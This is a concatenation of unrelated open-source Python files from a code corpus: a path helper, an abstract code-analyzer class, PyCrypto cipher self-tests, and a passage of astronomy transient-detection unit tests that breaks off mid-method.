def _relpath_posix(path, start=os.path.curdir):
"""Return a relative version of a path"""
if not path:
raise ValueError("no path specified")
start_list = os.path.abspath(start).split(os.path.sep)
path_list = os.path.abspath(path).split(os.path.sep)
# Work out how much of the filepath is shared by start and path.
i = len(os.path.commonprefix([start_list, path_list]))
rel_list = [os.path.pardir] * (len(start_list)-i) + path_list[i:]
if not rel_list:
return os.path.curdir
return os.path.join(*rel_list)
# Pick the implementation matching the active os.path flavour;
# default to the posixpath definition.
if os.path is sys.modules.get('ntpath'):
    relpath = _relpath_nt
else:
    relpath = _relpath_posix
| agpl-3.0 |
programmdesign/checkmate | checkmate/lib/analysis/base.py | 1 | 2319 | # -*- coding: utf-8 -*-
"""
This file is part of checkmate, a meta code checker written in Python.
Copyright (C) 2015 Andreas Dewes, QuantifiedCode UG
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from __future__ import unicode_literals
import abc
class BaseAnalyzer(object):

    """
    This abstract base class defines an analyzer, which takes file content and produces
    statistics as well as a list of issues. It is also responsible for diffing statistical
    data and issues obtained for different file revisions or snapshots.
    """

    def __init__(self, code_environment, params=None, ignore=None):
        """
        :param code_environment: the code environment the analyzer operates in
        :param params: optional analyzer-specific parameters
        :param ignore: optional iterable of issue codes to ignore
        """
        self.code_environment = code_environment
        self.params = params
        # Bug fix: `self.ignore` used to be assigned only when `ignore`
        # was provided, so any later attribute access raised
        # AttributeError in the (default) None case.  Always initialize
        # it to a dict mapping each ignored code to True.
        self.ignore = {}
        if ignore is not None:
            for code in ignore:
                self.ignore[code] = True

    @abc.abstractmethod
    def analyze(self, file_revision):
        """
        Analyze a file and return a tuple (stats,issues) containing statistics and issues.

        This method should return a dictionary with one of the following entries:

        * issues: A list of issues found in the file revision
        * stats: Statistics about the file revision
        * depends_on: A list of dependencies for the file revision
        * provides: A list of things the file revision provides (e.g. a module),
          to be used with the `depends_on` field.
        """
        pass

    def diff(self, results_a, results_b):
        # Default implementation: no diffing; subclasses may override.
        pass

    def diff_summary(self, summary_a, summary_b):
        # Default implementation: no summary diffing; subclasses may override.
        pass

    @abc.abstractmethod
    def summarize(self, items):
        """
        Aggregate a list of items containing statistical information generated by 'analyze'.
        """
        pass
| agpl-3.0 |
szymex/xbmc-finnish-tv | plugin.video.yleareena/win32/Crypto/SelfTest/Cipher/common.py | 115 | 16599 | # -*- coding: utf-8 -*-
#
# SelfTest/Hash/common.py: Common code for Crypto.SelfTest.Hash
#
# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""Self-testing for PyCrypto hash modules"""
__revision__ = "$Id$"
import sys
import unittest
from binascii import a2b_hex, b2a_hex
from Crypto.Util.py3compat import *
# For compatibility with Python 2.1 and Python 2.2
# Compatibility shim: guarantee a keyword-argument dict() constructor on
# ancient interpreters (the rest of this module calls dict(key=value, ...)).
if sys.hexversion < 0x02030000:
    # Python 2.1 doesn't have a dict() function
    # Python 2.2 dict() function raises TypeError if you do dict(MD5='blah')
    def dict(**kwargs):
        return kwargs.copy()
else:
    # Modern interpreters: keep the builtin untouched.
    dict = dict
class _NoDefault: pass # sentinel object
def _extract(d, k, default=_NoDefault):
"""Get an item from a dictionary, and remove it from the dictionary."""
try:
retval = d[k]
except KeyError:
if default is _NoDefault:
raise
return default
del d[k]
return retval
# Generic cipher test case
class CipherSelfTest(unittest.TestCase):
    """Known-answer test for one cipher/mode/key/plaintext/ciphertext tuple.

    Encrypts the plaintext and decrypts the ciphertext (each twice, with
    fresh cipher objects) and compares against the expected hex strings.
    NOTE(review): uses dict.has_key -- Python 2 only.
    """
    def __init__(self, module, params):
        unittest.TestCase.__init__(self)
        self.module = module

        # Extract the parameters
        params = params.copy()
        self.description = _extract(params, 'description')
        self.key = b(_extract(params, 'key'))
        self.plaintext = b(_extract(params, 'plaintext'))
        self.ciphertext = b(_extract(params, 'ciphertext'))
        self.module_name = _extract(params, 'module_name', None)

        mode = _extract(params, 'mode', None)
        self.mode_name = str(mode)
        if mode is not None:
            # Block cipher
            self.mode = getattr(self.module, "MODE_" + mode)

            self.iv = _extract(params, 'iv', None)
            if self.iv is not None: self.iv = b(self.iv)

            # Only relevant for OPENPGP mode
            self.encrypted_iv = _extract(params, 'encrypted_iv', None)
            if self.encrypted_iv is not None:
                self.encrypted_iv = b(self.encrypted_iv)
        else:
            # Stream cipher
            self.mode = None
            self.iv = None

        # Anything left over is forwarded to module.new() by _new().
        self.extra_params = params

    def shortDescription(self):
        return self.description

    def _new(self, do_decryption=0):
        """Build a fresh cipher object; do_decryption matters for OPENPGP."""
        params = self.extra_params.copy()

        # Handle CTR mode parameters.  By default, we use Counter.new(self.module.block_size)
        if hasattr(self.module, "MODE_CTR") and self.mode == self.module.MODE_CTR:
            from Crypto.Util import Counter
            ctr_class = _extract(params, 'ctr_class', Counter.new)
            ctr_params = _extract(params, 'ctr_params', {}).copy()
            if ctr_params.has_key('prefix'): ctr_params['prefix'] = a2b_hex(b(ctr_params['prefix']))
            if ctr_params.has_key('suffix'): ctr_params['suffix'] = a2b_hex(b(ctr_params['suffix']))
            if not ctr_params.has_key('nbits'):
                # Counter width = block size minus fixed prefix/suffix bytes.
                ctr_params['nbits'] = 8*(self.module.block_size - len(ctr_params.get('prefix', '')) - len(ctr_params.get('suffix', '')))
            params['counter'] = ctr_class(**ctr_params)

        if self.mode is None:
            # Stream cipher
            return self.module.new(a2b_hex(self.key), **params)
        elif self.iv is None:
            # Block cipher without iv
            return self.module.new(a2b_hex(self.key), self.mode, **params)
        else:
            # Block cipher with iv
            if do_decryption and self.mode == self.module.MODE_OPENPGP:
                # In PGP mode, the IV to feed for decryption is the *encrypted* one
                return self.module.new(a2b_hex(self.key), self.mode, a2b_hex(self.encrypted_iv), **params)
            else:
                return self.module.new(a2b_hex(self.key), self.mode, a2b_hex(self.iv), **params)

    def runTest(self):
        plaintext = a2b_hex(self.plaintext)
        ciphertext = a2b_hex(self.ciphertext)

        # Each operation gets a fresh cipher object; repeating it guards
        # against state leaking between instances.
        ct1 = b2a_hex(self._new().encrypt(plaintext))
        pt1 = b2a_hex(self._new(1).decrypt(ciphertext))
        ct2 = b2a_hex(self._new().encrypt(plaintext))
        pt2 = b2a_hex(self._new(1).decrypt(ciphertext))

        if hasattr(self.module, "MODE_OPENPGP") and self.mode == self.module.MODE_OPENPGP:
            # In PGP mode, data returned by the first encrypt()
            # is prefixed with the encrypted IV.
            # Here we check it and then remove it from the ciphertexts.
            eilen = len(self.encrypted_iv)
            self.assertEqual(self.encrypted_iv, ct1[:eilen])
            self.assertEqual(self.encrypted_iv, ct2[:eilen])
            ct1 = ct1[eilen:]
            ct2 = ct2[eilen:]

        self.assertEqual(self.ciphertext, ct1)  # encrypt
        self.assertEqual(self.ciphertext, ct2)  # encrypt (second time)
        self.assertEqual(self.plaintext, pt1)   # decrypt
        self.assertEqual(self.plaintext, pt2)   # decrypt (second time)
class CipherStreamingSelfTest(CipherSelfTest):
    """Same known-answer vectors as CipherSelfTest, but fed 3 bytes at a
    time to verify the cipher behaves like a stream cipher (partial-block
    calls concatenate to the same result as one big call)."""

    def shortDescription(self):
        desc = self.module_name
        if self.mode is not None:
            desc += " in %s mode" % (self.mode_name,)
        return "%s should behave like a stream cipher" % (desc,)

    def runTest(self):
        plaintext = a2b_hex(self.plaintext)
        ciphertext = a2b_hex(self.ciphertext)

        # The cipher should work like a stream cipher

        # Test counter mode encryption, 3 bytes at a time
        ct3 = []
        cipher = self._new()
        for i in range(0, len(plaintext), 3):
            ct3.append(cipher.encrypt(plaintext[i:i+3]))
        ct3 = b2a_hex(b("").join(ct3))
        self.assertEqual(self.ciphertext, ct3)  # encryption (3 bytes at a time)

        # Test counter mode decryption, 3 bytes at a time
        # (encrypt() is used deliberately: for CTR/stream ciphers the
        # keystream XOR makes encryption and decryption the same operation)
        pt3 = []
        cipher = self._new()
        for i in range(0, len(ciphertext), 3):
            pt3.append(cipher.encrypt(ciphertext[i:i+3]))
        # PY3K: This is meant to be text, do not change to bytes (data)
        pt3 = b2a_hex(b("").join(pt3))
        self.assertEqual(self.plaintext, pt3)  # decryption (3 bytes at a time)
class CTRSegfaultTest(unittest.TestCase):
    """Regression check: creating a CTR cipher without a counter keyword
    must raise TypeError instead of crashing the interpreter."""

    def __init__(self, module, params):
        unittest.TestCase.__init__(self)
        self.module = module
        self.module_name = params.get('module_name', None)
        self.key = b(params['key'])

    def shortDescription(self):
        name = self.module_name
        return """Regression test: %s.new(key, %s.MODE_CTR) should raise TypeError, not segfault""" % (name, name)

    def runTest(self):
        raw_key = a2b_hex(self.key)
        # No counter= argument supplied -> must fail cleanly.
        self.assertRaises(TypeError, self.module.new, raw_key, self.module.MODE_CTR)
class CTRWraparoundTest(unittest.TestCase):
    """Regression check: incrementing a CTR counter past its maximum value
    must raise OverflowError on both the shortcut and the generic
    PyObject_CallObject code paths."""

    def __init__(self, module, params):
        unittest.TestCase.__init__(self)
        self.module = module
        self.key = b(params['key'])
        self.module_name = params.get('module_name', None)

    def shortDescription(self):
        return """Regression test: %s with MODE_CTR should raise OverflowError on wraparound when shortcut used""" % (self.module_name,)

    def runTest(self):
        from Crypto.Util import Counter

        for disable_shortcut in (0, 1): # (False, True) Test CTR-mode shortcut and PyObject_CallObject code paths
            for little_endian in (0, 1): # (False, True) Test both endiannesses
                # Start the counter at its all-ones maximum so the next
                # increment must overflow.  NOTE: the literal was ``2L``,
                # a SyntaxError on Python 3; plain ``2`` is value-identical
                # on Python 2 because 2**(8*block_size) auto-promotes to long.
                ctr = Counter.new(8*self.module.block_size, initial_value=2**(8*self.module.block_size)-1, little_endian=little_endian, disable_shortcut=disable_shortcut)
                cipher = self.module.new(a2b_hex(self.key), self.module.MODE_CTR, counter=ctr)
                block = b("\x00") * self.module.block_size
                cipher.encrypt(block)
                self.assertRaises(OverflowError, cipher.encrypt, block)
class CFBSegmentSizeTest(unittest.TestCase):
    """Check that CFB mode rejects segment sizes that are not whole bytes."""

    def __init__(self, module, params):
        unittest.TestCase.__init__(self)
        self.module = module
        self.description = params['description']
        self.key = b(params['key'])

    def shortDescription(self):
        return self.description

    def runTest(self):
        """Regression test: m.new(key, m.MODE_CFB, segment_size=N) should require segment_size to be a multiple of 8 bits"""
        raw_key = a2b_hex(self.key)
        # Segment sizes of 1..7 bits are not byte-aligned: all rejected.
        for bits in range(1, 8):
            self.assertRaises(ValueError, self.module.new, raw_key, self.module.MODE_CFB, segment_size=bits)
        # A full byte (8 bits) is the smallest legal segment size.
        self.module.new(raw_key, self.module.MODE_CFB, "\0"*self.module.block_size, segment_size=8) # should succeed
class RoundtripTest(unittest.TestCase):
    """Encrypt-then-decrypt round trip with a random IV across every
    chaining mode; the recovered plaintext must equal the original."""

    def __init__(self, module, params):
        from Crypto import Random
        unittest.TestCase.__init__(self)
        self.module = module
        # Fresh random IV per test instance; reused for every mode below.
        self.iv = Random.get_random_bytes(module.block_size)
        self.key = b(params['key'])
        self.plaintext = 100 * b(params['plaintext'])
        self.module_name = params.get('module_name', None)

    def shortDescription(self):
        return """%s .decrypt() output of .encrypt() should not be garbled""" % (self.module_name,)

    def runTest(self):
        for mode in (self.module.MODE_ECB, self.module.MODE_CBC, self.module.MODE_CFB, self.module.MODE_OFB, self.module.MODE_OPENPGP):
            encryption_cipher = self.module.new(a2b_hex(self.key), mode, self.iv)
            ciphertext = encryption_cipher.encrypt(self.plaintext)

            if mode != self.module.MODE_OPENPGP:
                decryption_cipher = self.module.new(a2b_hex(self.key), mode, self.iv)
            else:
                # OPENPGP mode prefixes the output with the encrypted IV:
                # block_size bytes plus a 2-byte checksum.  Strip it off and
                # feed it back as the decryption IV.
                eiv = ciphertext[:self.module.block_size+2]
                ciphertext = ciphertext[self.module.block_size+2:]
                decryption_cipher = self.module.new(a2b_hex(self.key), mode, eiv)
            decrypted_plaintext = decryption_cipher.decrypt(ciphertext)
            self.assertEqual(self.plaintext, decrypted_plaintext)
class PGPTest(unittest.TestCase):
    """Ensure the removed (insecure) MODE_PGP can no longer be constructed."""

    def __init__(self, module, params):
        unittest.TestCase.__init__(self)
        self.key = b(params['key'])
        self.module = module

    def shortDescription(self):
        return "MODE_PGP was implemented incorrectly and insecurely. It's completely banished now."

    def runTest(self):
        raw_key = a2b_hex(self.key)
        self.assertRaises(ValueError, self.module.new, raw_key, self.module.MODE_PGP)
class IVLengthTest(unittest.TestCase):
    """Verify that an empty IV is rejected by the IV-using modes, while
    ECB and CTR (which take no IV) accept it."""

    def __init__(self, module, params):
        unittest.TestCase.__init__(self)
        self.module = module
        self.key = b(params['key'])

    def shortDescription(self):
        return "Check that all modes except MODE_ECB and MODE_CTR require an IV of the proper length"

    def runTest(self):
        # IV-based modes: zero-length IV must raise ValueError.
        self.assertRaises(ValueError, self.module.new, a2b_hex(self.key),
                self.module.MODE_CBC, "")
        self.assertRaises(ValueError, self.module.new, a2b_hex(self.key),
                self.module.MODE_CFB, "")
        self.assertRaises(ValueError, self.module.new, a2b_hex(self.key),
                self.module.MODE_OFB, "")
        self.assertRaises(ValueError, self.module.new, a2b_hex(self.key),
                self.module.MODE_OPENPGP, "")
        # IV-less modes: the empty IV argument is simply ignored.
        self.module.new(a2b_hex(self.key), self.module.MODE_ECB, "")
        self.module.new(a2b_hex(self.key), self.module.MODE_CTR, "", counter=self._dummy_counter)

    def _dummy_counter(self):
        # Minimal stand-in counter callable: a constant all-zero block.
        return "\0" * self.module.block_size
def make_block_tests(module, module_name, test_data):
    """Build a list of TestCase instances for a block cipher module.

    Each row of test_data is a 3/4/5-tuple:
    (plaintext, ciphertext, key[, description[, extra_params]]).
    A set of one-off regression tests is prepended before the first
    known-answer test.  NOTE(review): uses dict.has_key -- Python 2 only.
    """
    tests = []
    extra_tests_added = 0
    for i in range(len(test_data)):
        row = test_data[i]

        # Build the "params" dictionary
        params = {'mode': 'ECB'}
        if len(row) == 3:
            (params['plaintext'], params['ciphertext'], params['key']) = row
        elif len(row) == 4:
            (params['plaintext'], params['ciphertext'], params['key'], params['description']) = row
        elif len(row) == 5:
            (params['plaintext'], params['ciphertext'], params['key'], params['description'], extra_params) = row
            params.update(extra_params)
        else:
            raise AssertionError("Unsupported tuple size %d" % (len(row),))

        # Build the display-name for the test
        p2 = params.copy()
        p_key = _extract(p2, 'key')
        p_plaintext = _extract(p2, 'plaintext')
        p_ciphertext = _extract(p2, 'ciphertext')
        p_description = _extract(p2, 'description', None)
        p_mode = p2.get('mode', 'ECB')
        if p_mode == 'ECB':
            # Drop the default mode so it doesn't clutter the description.
            _extract(p2, 'mode', 'ECB')

        if p_description is not None:
            description = p_description
        elif p_mode == 'ECB' and not p2:
            description = "p=%s, k=%s" % (p_plaintext, p_key)
        else:
            description = "p=%s, k=%s, %r" % (p_plaintext, p_key, p2)
        name = "%s #%d: %s" % (module_name, i+1, description)
        params['description'] = name
        params['module_name'] = module_name

        # Add extra test(s) to the test suite before the current test
        if not extra_tests_added:
            tests += [
                CTRSegfaultTest(module, params),
                CTRWraparoundTest(module, params),
                CFBSegmentSizeTest(module, params),
                RoundtripTest(module, params),
                PGPTest(module, params),
                IVLengthTest(module, params),
            ]
            extra_tests_added = 1

        # Add the current test to the test suite
        tests.append(CipherSelfTest(module, params))

        # When using CTR mode, test that the interface behaves like a stream cipher
        if p_mode == 'CTR':
            tests.append(CipherStreamingSelfTest(module, params))

        # When using CTR mode, test the non-shortcut code path.
        if p_mode == 'CTR' and not params.has_key('ctr_class'):
            params2 = params.copy()
            params2['description'] += " (shortcut disabled)"
            ctr_params2 = params.get('ctr_params', {}).copy()
            params2['ctr_params'] = ctr_params2
            if not params2['ctr_params'].has_key('disable_shortcut'):
                params2['ctr_params']['disable_shortcut'] = 1
            tests.append(CipherSelfTest(module, params2))
    return tests
def make_stream_tests(module, module_name, test_data):
    """Build a list of TestCase instances for a stream cipher module.

    Same row format as make_block_tests, but without a mode and without
    the block-cipher-only regression tests; every vector is exercised both
    in one shot and 3 bytes at a time.
    """
    tests = []
    for i in range(len(test_data)):
        row = test_data[i]

        # Build the "params" dictionary
        params = {}
        if len(row) == 3:
            (params['plaintext'], params['ciphertext'], params['key']) = row
        elif len(row) == 4:
            (params['plaintext'], params['ciphertext'], params['key'], params['description']) = row
        elif len(row) == 5:
            (params['plaintext'], params['ciphertext'], params['key'], params['description'], extra_params) = row
            params.update(extra_params)
        else:
            raise AssertionError("Unsupported tuple size %d" % (len(row),))

        # Build the display-name for the test
        p2 = params.copy()
        p_key = _extract(p2, 'key')
        p_plaintext = _extract(p2, 'plaintext')
        p_ciphertext = _extract(p2, 'ciphertext')
        p_description = _extract(p2, 'description', None)

        if p_description is not None:
            description = p_description
        elif not p2:
            description = "p=%s, k=%s" % (p_plaintext, p_key)
        else:
            description = "p=%s, k=%s, %r" % (p_plaintext, p_key, p2)
        name = "%s #%d: %s" % (module_name, i+1, description)
        params['description'] = name
        params['module_name'] = module_name

        # Add the test to the test suite
        tests.append(CipherSelfTest(module, params))
        tests.append(CipherStreamingSelfTest(module, params))
    return tests
# vim:set ts=4 sw=4 sts=4 expandtab:
| gpl-3.0 |
transientskp/tkp | tests/test_database/test_transients.py | 1 | 37227 | import unittest
from collections import defaultdict
import tkp.db
from tkp.db.associations import associate_extracted_sources
from tkp.db.general import insert_extracted_sources, frequency_bands, runcat_entries
from tkp.testutil import db_subs
from tkp.testutil.db_subs import (example_extractedsource_tuple,
MockSource,
insert_image_and_simulated_sources,
get_newsources_for_dataset,
get_sources_filtered_by_final_variability)
from tkp.testutil.decorators import requires_database
# Convenient default values
# De Ruiter radius: dimensionless source-association distance threshold
# passed to associate_extracted_sources() throughout these tests.
deRuiter_r = 3.7
class TestSimplestCases(unittest.TestCase):
    """
    Various basic test-cases of the transient-detection logic.

    In these simple cases we just have one source, fixed image properties,
    and identical min/max image RMS values.

    As a result, we can only test for type 1 / 2 transients here, i.e.
    -type 1: single-epoch, bright enough that we would previously have seen it
        wherever in the image it lies, or
    -type 2: multi-epoch, identified by variability, possibly from forced-fits.

    (Type 0 is a possible single-epoch transient, that might just be a steady
    source fluctuating in a high-RMS region, or might be real transient
    if it's seen in the low-RMS region).
    """
    @requires_database()
    def setUp(self):
        """Create a per-test dataset plus 4 time-spaced image parameter sets."""
        self.database = tkp.db.Database()
        self.dataset = tkp.db.DataSet(database=self.database,
                data={'description':"Trans:"
                        + self._testMethodName})
        self.n_images = 4
        self.new_source_sigma_margin = 3
        image_rms = 1e-3
        detection_thresh=10

        self.search_params = dict(eta_min=1,
                                  v_min=0.1,
                                  # minpoints=1,
                                  )

        # Flux just above the blind-detection threshold vs. flux bright
        # enough to clear the extra new-source sigma margin as well.
        self.barely_detectable_flux = 1.01*image_rms*(detection_thresh)
        self.reliably_detectable_flux = (
            1.01*image_rms*(detection_thresh+self.new_source_sigma_margin))

        # 1mJy image RMS, 10-sigma detection threshold = 10mJy threshold.
        test_specific_img_params = dict(rms_qc = image_rms,
                                rms_min = image_rms,
                                rms_max = image_rms,
                                detection_thresh = detection_thresh)

        self.im_params = db_subs.generate_timespaced_dbimages_data(
            self.n_images,**test_specific_img_params)

    def tearDown(self):
        # Never commit: each test runs against a rolled-back transaction.
        tkp.db.rollback()

    def test_steady_source(self):
        """
        Sanity check: Ensure we get no newsource table entries for a steady
        source.
        """
        im_params = self.im_params
        steady_src = db_subs.MockSource(
            template_extractedsource=db_subs.example_extractedsource_tuple(
                ra=im_params[0]['centre_ra'],
                dec=im_params[0]['centre_decl'],
            ),
            # Same (reliably detectable) flux at every epoch.
            lightcurve=defaultdict(lambda : self.reliably_detectable_flux)
        )

        # NOTE(review): inserted_sources is accumulated nowhere below; unused.
        inserted_sources = []

        for img_pars in im_params:
            image, _,forced_fits = insert_image_and_simulated_sources(
                self.dataset,img_pars,[steady_src],
                self.new_source_sigma_margin)
            #should not have any nulldetections
            self.assertEqual(len(forced_fits), 0)

        transients = get_sources_filtered_by_final_variability(
            dataset_id=self.dataset.id, **self.search_params)
        newsources = get_newsources_for_dataset(self.dataset.id)
        #or newsources, high variability sources
        self.assertEqual(len(transients), 0)
        self.assertEqual(len(newsources), 0)

    def test_single_epoch_bright_transient(self):
        """A bright transient appears at field centre in one image."""
        im_params = self.im_params
        transient_src = db_subs.MockSource(
            template_extractedsource=db_subs.example_extractedsource_tuple(
                ra=im_params[0]['centre_ra'],
                dec=im_params[0]['centre_decl'],
            ),
            # Single bright detection in the third image only.
            lightcurve={im_params[2]['taustart_ts'] :
                            self.reliably_detectable_flux}
        )

        for img_pars in im_params[:3]:
            image, _,forced_fits = insert_image_and_simulated_sources(
                self.dataset,img_pars,[transient_src],
                self.new_source_sigma_margin)
            self.assertEqual(len(forced_fits), 0)

        # Check the number of detected transients
        transients = get_newsources_for_dataset(self.dataset.id)
        self.assertEqual(len(transients), 1)
        newsrc_properties = transients[0]

        # Check that the bands for the images are the same as the transient's band
        freq_bands = frequency_bands(self.dataset._id)
        self.assertEqual(len(freq_bands), 1)
        self.assertEqual(freq_bands[0], newsrc_properties['band'])

        # Sanity check that the runcat is correctly matched
        runcats = runcat_entries(self.dataset._id)
        self.assertEqual(len(runcats), 1)
        self.assertEqual(runcats[0]['runcat'], newsrc_properties['runcat_id'])

        # Since it is a single-epoch source, variability indices default to 0:
        self.assertEqual(newsrc_properties['v_int'],0)
        self.assertEqual(newsrc_properties['eta_int'],0)
        # Bright 'new-source' / single-epoch transient; should have high sigmas:
        self.assertTrue(
            newsrc_properties['low_thresh_sigma']> self.new_source_sigma_margin)
        self.assertEqual(newsrc_properties['low_thresh_sigma'],
                         newsrc_properties['high_thresh_sigma'])

        # Check the correct trigger xtrsrc was identified:
        # NOTE(review): dict.keys()[0] is Python 2 only syntax.
        self.assertEqual(newsrc_properties['taustart_ts'],
                         transient_src.lightcurve.keys()[0])

        # Ok, now add the last image and check that we get a correct forced-fit
        # request:
        image, _,forced_fits = insert_image_and_simulated_sources(
            self.dataset,im_params[3],[transient_src],
            self.new_source_sigma_margin)
        self.assertEqual(len(forced_fits),1)

        transients = get_sources_filtered_by_final_variability(
            dataset_id=self.dataset.id,**self.search_params)
        self.assertEqual(len(transients), 1)
        transient_properties = transients[0]

        # And now we should have a non-zero variability value
        self.assertNotAlmostEqual(transient_properties['v_int'], 0)
        self.assertNotAlmostEqual(transient_properties['eta_int'], 0)

    def test_single_epoch_weak_transient(self):
        """
        A weak (barely detected in blind extraction) transient appears at
        field centre in one image, then disappears entirely.

        Because it is a weak extraction, it will not be immediately marked
        as transient, but it will get flagged up after forced-fitting due to
        the variability search.
        """
        im_params = self.im_params
        transient_src = db_subs.MockSource(
            template_extractedsource=db_subs.example_extractedsource_tuple(
                ra=im_params[0]['centre_ra'],
                dec=im_params[0]['centre_decl'],
            ),
            lightcurve={im_params[2]['taustart_ts'] :
                            self.barely_detectable_flux}
        )

        for img_pars in im_params[:3]:
            image, _, forced_fits = insert_image_and_simulated_sources(
                self.dataset, img_pars, [transient_src],
                self.new_source_sigma_margin)
            self.assertEqual(forced_fits, [])

        # Too weak to be flagged as a new source on detection alone.
        newsources = get_newsources_for_dataset(self.dataset.id)
        self.assertEqual(len(newsources), 0)
        transients = get_sources_filtered_by_final_variability(
            dataset_id=self.dataset.id, **self.search_params)
        # No variability yet
        self.assertEqual(len(transients), 0)

        # Now, the final, empty image:
        image, blind_extractions, forced_fits = insert_image_and_simulated_sources(
            self.dataset, im_params[3], [transient_src],
            self.new_source_sigma_margin)
        self.assertEqual(len(blind_extractions), 0)
        self.assertEqual(len(forced_fits), 1)

        # No changes to newsource table
        newsources = get_newsources_for_dataset(self.dataset.id)
        self.assertEqual(len(newsources), 0)
        # But it now has high variability
        transients = get_sources_filtered_by_final_variability(
            dataset_id=self.dataset.id, **self.search_params)
        self.assertEqual(len(transients), 1)
        transient_properties = transients[0]

        # Check that the bands for the images are the same as the transient's band
        freq_bands = frequency_bands(self.dataset._id)
        self.assertEqual(len(freq_bands), 1)
        self.assertEqual(freq_bands[0], transient_properties['band'])

        # Sanity check that the runcat is correctly matched
        runcats = runcat_entries(self.dataset._id)
        self.assertEqual(len(runcats), 1)
        self.assertEqual(runcats[0]['runcat'], transient_properties['runcat_id'])

    def test_multi_epoch_source_flare_and_fade(self):
        """
        A steady source (i.e. detected in first image) flares up,
        then fades and finally disappears.
        """
        im_params = self.im_params
        transient_src = db_subs.MockSource(
            template_extractedsource=db_subs.example_extractedsource_tuple(
                ra=im_params[0]['centre_ra'],
                dec=im_params[0]['centre_decl'],
            ),
            # Baseline flux, then a 2x flare, then back to baseline;
            # absent from the fourth epoch entirely.
            lightcurve={
                im_params[0]['taustart_ts'] : self.barely_detectable_flux,
                im_params[1]['taustart_ts'] : 2*self.barely_detectable_flux,
                im_params[2]['taustart_ts'] : self.barely_detectable_flux,
            }
        )

        inserted_sources = []
        for img_pars in im_params[:2]:
            image, blind_xtr,forced_fits = insert_image_and_simulated_sources(
                self.dataset,img_pars,[transient_src],
                self.new_source_sigma_margin)
            self.assertEqual(len(forced_fits), 0)
            inserted_sources.extend(blind_xtr)

        #This should always be 0:
        newsources = get_newsources_for_dataset(self.dataset.id)
        self.assertEqual(len(newsources), 0)
        transients = get_sources_filtered_by_final_variability(dataset_id=self.dataset.id,
                                               **self.search_params)
        #We've seen a flare:
        self.assertEqual(len(transients), 1)
        transient_properties = transients[0]

        # Check that the bands for the images are the same as the transient's band
        freq_bands = frequency_bands(self.dataset._id)
        self.assertEqual(len(freq_bands), 1)
        self.assertEqual(freq_bands[0], transient_properties['band'])

        #Sanity check that the runcat is correctly matched
        runcats = runcat_entries(self.dataset._id)
        self.assertEqual(len(runcats), 1)
        self.assertEqual(runcats[0]['runcat'], transient_properties['runcat_id'])

        #Check we have sensible variability indices
        # print "\n",transient_properties
        metrics = db_subs.lightcurve_metrics(inserted_sources)
        # print "\nAfter two images:"
        for metric_name in 'v_int', 'eta_int':
            # print metric_name, transient_properties[metric_name]
            self.assertAlmostEqual(transient_properties[metric_name],
                                   metrics[-1][metric_name])

        #Add 3rd image (another blind detection), check everything is sane
        image, blind_xtr,forced_fits = insert_image_and_simulated_sources(
            self.dataset,im_params[2],[transient_src],
            self.new_source_sigma_margin)
        self.assertEqual(len(forced_fits), 0)
        inserted_sources.extend(blind_xtr)
        self.assertEqual(len(get_newsources_for_dataset(self.dataset.id)),0)

        # Ok, now add the last image and check that we get a correct forced-fit
        # request:
        image, blind_xtr,forced_fits = insert_image_and_simulated_sources(
            self.dataset,im_params[3],[transient_src],
            self.new_source_sigma_margin)
        self.assertEqual(len(blind_xtr),0)
        self.assertEqual(len(forced_fits),1)
        inserted_sources.extend(forced_fits)

        self.assertEqual(len(get_newsources_for_dataset(self.dataset.id)),0)
        transients = get_sources_filtered_by_final_variability(dataset_id=self.dataset.id,
                                               **self.search_params)
        # Variability indices should take non-detections into account
        self.assertEqual(len(transients), 1)
        transient_properties = transients[0]
        metrics = db_subs.lightcurve_metrics(inserted_sources)
        # print "\nAfter four images:"
        for metric_name in 'v_int', 'eta_int':
            # print metric_name, transient_properties[metric_name]
            self.assertAlmostEqual(transient_properties[metric_name],
                                   metrics[-1][metric_name])
class TestDecreasingImageRMS(unittest.TestCase):
    """
    These unit-tests enumerate the possible cases where we process an image
    with a lower RMS value, and see a new source. Is it a transient, or
    just a steady source that was lost in the noise before?
    """
    def shortDescription(self):
        # Suppress docstring-derived test descriptions in unittest output.
        return None

    @requires_database()
    def setUp(self):
        """Two images; the second has its RMS values halved."""
        self.database = tkp.db.Database()
        self.dataset = tkp.db.DataSet(
            data={'description':"Trans:" +self._testMethodName},
            database=self.database)

        self.n_images = 2
        self.rms_min_initial = 2e-3 #2mJy
        self.rms_max_initial = 5e-3 #5mJy
        self.new_source_sigma_margin = 3
        self.detection_thresh=10

        dt=self.detection_thresh
        margin = self.new_source_sigma_margin
        #These all refer to the first image, they should all be clearly
        #detected in the second image:
        self.barely_detectable_flux = 1.01*self.rms_min_initial*dt
        self.reliably_detected_at_image_centre_flux = (
            1.01*self.rms_min_initial*(dt+ margin))
        self.always_detectable_flux = 1.01*self.rms_max_initial*(dt+ margin)

        test_specific_img_params = dict(rms_qc = self.rms_min_initial,
                                rms_min = self.rms_min_initial,
                                rms_max = self.rms_max_initial,
                                detection_thresh = self.detection_thresh)

        self.img_params = db_subs.generate_timespaced_dbimages_data(
            self.n_images, **test_specific_img_params)
        #Drop RMS to 1 mJy / 2.5mJy in second image.
        rms_decrease_factor = 0.5
